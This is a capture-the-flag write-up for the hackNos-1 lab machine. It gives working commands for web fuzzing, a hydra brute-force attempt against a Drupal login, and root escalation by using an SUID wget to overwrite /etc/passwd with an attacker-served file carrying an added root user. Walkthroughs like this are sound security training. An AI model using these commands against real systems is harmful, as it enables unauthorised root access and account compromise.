Last updated: 15 Apr 24 09:30:40 (UTC)

Write-Up HackNos-1

HackNos-1

By Lawcky 02/01/2024

Introduction

Flag : 2 Flag first user And second root

Learning : exploit | Web Application | Enumeration | Privilege Escalation

Difficulty : easy-medium

Additionnal info :

Name: hackNos: Os-hackNos
Release date: 27 Nov 2019
Author: Rahul Gehlaut
Series: hackNos

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

In this write-up

  • ffuf
  • burp decoder tool
  • nikto
  • nmap
  • php rce
  • SUID for Wget

Write-UP

we fuzz the website for hidden directories
sudo ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.10/FUZZ

0bc4a0235a6cd419dc30f6e0f3b136e8.png

d816aa15ca6490b42119516d503933c3.png

lets try to get it
sudo hydra -l james -P /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt 192.168.1.10 http-post-form '/drupal/:name=^USER^&pass=^PASS^:F=Sorry, unrecognized username or password'

3ed44b052fd3ce0b1be33b698e090d28.png

cannot bruteforce it it seems

lets fuzz and nikto scan drupal
nikto -h http://192.168.1.10/drupal/
for nikto ===> here
sudo ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.10/drupal/FUZZ

http://192.168.1.10/drupal/sites/README.txt
fba961177f164bc86c19d7142713a2e4.png

lots of code and config files in drupal/includes

User Enumeration

===> hacktrix

there are 2 users

c539ae6a217a2ca8f3b7aab87bb0f2f2.png

james and another one

version isĀ  < 8 and the php modules is installed

14fd06d6770ac0929ac3a99a0e729461.png

after rerunning another ffuf fuzz we found alexander.txt

6158a88de570cddbe0bed3f8e8fd852c.png

inside :

2880e6371488ac4ce3b04f1beacbca18.png

decoding it we get :

06701e6c272529210dddd3109441a3d3.png

After some research we find that its a brainfuck programs, once decoded the result is

7a34c27155dff740eed538131cb16d18.png

99d9cc647a21f0af4c33c3249dbbc7a4.png

RCE using php modules

back to ===> hacktrix

ea0414376d7b53aaa13f5ffe2d60ba93.png

then adding the php code in a page to then running it

7232566a979add01391fa9e3ae2d386a.png 910281c545b2103b327a675db7ac643f.png

upgrading to better tty

d6818431002645dab14a57ad066b0d6b.png 7bead14114386a63cd6e54cf42b03693.png

first flag found

Privilege Escalation

Using SUID

find / -perm -4000

b42e4159d4a9ca1f7603f8e818041ce5.png

wget has a vulnerable SUID ===> gtfo

we can create a copy of the /etc/passwd file and replace it using the wget command with these SUID permissions

on my machine :

vim /home/passwd

copying the passwd of the target

openssl passwd -1

then creating a new user

echo 'pwned:$1$k3gC0LDh$3BmH74WpKupICQLY0CdnD1:0:0:hackingAcc:/root:/bin/bash' >> /home/passwd pwned:pwned

python3 -m http.server 8000

on the target :

cd /etc wget http://192.168.1.253:8000/passwd -O passwd

17d88e9a4ea1608d0b53958d1be3efa1.png

84eeb2a8ac503062febd8ba52301a443.png

second flag found

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.